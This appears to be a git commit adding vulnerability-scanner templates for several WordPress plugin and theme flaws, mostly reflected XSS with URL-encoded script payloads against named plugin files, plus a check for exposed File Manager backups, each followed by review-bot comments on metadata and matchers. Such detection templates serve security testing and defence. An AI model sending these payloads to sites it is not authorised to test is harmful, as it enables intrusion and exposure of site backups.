Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1 parent
dc2bed7
commit a4d1be1
Showing
14 changed files
with
450 additions
and
1 deletion.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241215 | ||
20241216 |
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2011-5106 | ||
|
||
info: | ||
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 | ||
tags: cve,cve2011,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
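Review bot: The info block for CVE-2011-5106 has no classification section, and reference is a plain scalar rather than a list, while the later templates in this commit carry cve-id, cwe-id and CVSS fields and list their references. Please add a classification block with at least cve-id: CVE-2011-5106 and cwe-id: CWE-79, and turn reference into a list. The body matcher also relies on the reflected payload alone; a string specific to the plugin's edit-post.php output would keep a generic page that echoes the query string from being reported under this CVE.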
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,25 @@ | ||
id: CVE-2013-4625 | ||
info: | ||
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 | ||
tags: cve,cve2013,wordpress,xss,wp-plugin | ||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
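Review bot: The request path sends remove=1 to installer.cleanup.php alongside the package payload. Given the script name, please confirm that this parameter does not delete files on the target, and drop it if the reflection of package is reachable without it, so the check stays read-only. As in the CVE-2011-5106 template, there is no classification block and reference is a scalar rather than a list.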
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,32 @@ | ||
id: CVE-2014-4550 | ||
info: | ||
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS | ||
author: daffainfo | ||
severity: medium | ||
reference: | | ||
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550 | ||
tags: cve,cve2014,wordpress,wp-plugin,xss | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2014-4550 | ||
cwe-id: CWE-79 | ||
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter." | ||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "'><script>alert(document.domain)</script>" | ||
part: body | ||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
- type: status | ||
status: | ||
- 200 |
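Review bot: The plugin directory in the request path is written as "shortcode–ninja" with an en dash (U+2013) between the two words instead of an ASCII hyphen, so the request will go to a directory that almost certainly does not exist and the template will never match. Please retype it as shortcode-ninja. Separately, "reference: |" makes the two URLs a single block-scalar string; remove the pipe so they parse as a list like the other templates in this commit.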
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2016-1000133 | ||
|
||
info: | ||
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 | ||
reference: | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 | ||
- https://wordpress.org/plugins/forget-about-shortcode-buttons | ||
- http://www.vapidlabs.com/wp/wp_advisory.php?v=602 | ||
- http://www.securityfocus.com/bid/93869 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2016-1000133 | ||
cwe-id: CWE-79 | ||
tags: cve,cve2016,wordpress,xss,wp-plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
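Review bot: The description ("Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1") does not say which file or parameter is affected, although the path shows the payload going into the ver parameter of assets/js/fasc-buttons/popup.php. Please name both in the description so a finding can be triaged without reading the request. The body matcher is the generic payload only; adding a second word taken from popup.php's normal output, combined with condition: and, would tie a hit to this plugin.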
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,39 @@ | ||
id: CVE-2016-1000139 | ||
|
||
info: | ||
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS | ||
author: daffainfo | ||
severity: medium | ||
reference: | ||
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139 | ||
tags: cve,cve2016,wordpress,wp-plugin,xss | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2016-1000139 | ||
cwe-id: CWE-79 | ||
description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11" | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- '"><script>alert(document.domain);</script><"' | ||
- 'input type="text" name="ContactId"' | ||
condition: and | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
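Review bot: The name gives the affected range as "<= 1.5.11" but the description only says "v1.5.11" and omits the affected script and parameter (examples/leadscoring.php, ContactId) that the path uses. Please align the two and name the file and parameter. Minor: cvss-score is written 6.10 here and 6.1 in the CVE-2016-1000133 template; pick one form. The second body word (input type="text" name="ContactId") with condition: and is a good anchor and worth copying into the other XSS templates in this commit.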
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,40 @@ | ||
id: CVE-2020-17362 | ||
|
||
info: | ||
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. | ||
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 | ||
tags: cve,cve2020,wordpress,xss,wp-plugin | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2020-17362 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
words: | ||
- "nova-lite" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
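Review bot: The tags line ends with wp-plugin, but the name and description say Nova Lite is a WordPress theme, so anyone filtering scans by tag will get this template in the wrong set. Please replace it with a theme tag such as wp-theme. The reference field is also a scalar here and does not include the NVD entry that the other CVE templates in this commit list.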
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2020-24312 | ||
|
||
info: | ||
name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure | ||
author: x1m_martijn | ||
severity: high | ||
description: | | ||
mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken. | ||
reference: | ||
- https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24312 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | ||
cvss-score: 7.5 | ||
cve-id: CVE-2020-24312 | ||
cwe-id: CWE-552 | ||
tags: cve,cve2020,wordpress,backups,plugin | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- 'Index of' | ||
- 'wp-content/uploads/wp-file-manager-pro/fm_backup' | ||
- 'backup_' | ||
condition: and | ||
|
||
# Enhanced by mp on 2022/04/08 |
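Review bot: The description names the exposed directory fm_backups, while the request path and the second matcher word both use fm_backup under wp-file-manager-pro. Please check which spelling the plugin actually creates and make the description, path and matcher agree, since a wrong directory name means the template silently never fires. Also note that the 'Index of' word restricts detection to servers with directory listing enabled, which is worth stating in the description, and that the word matcher has no explicit part, so it relies on the default.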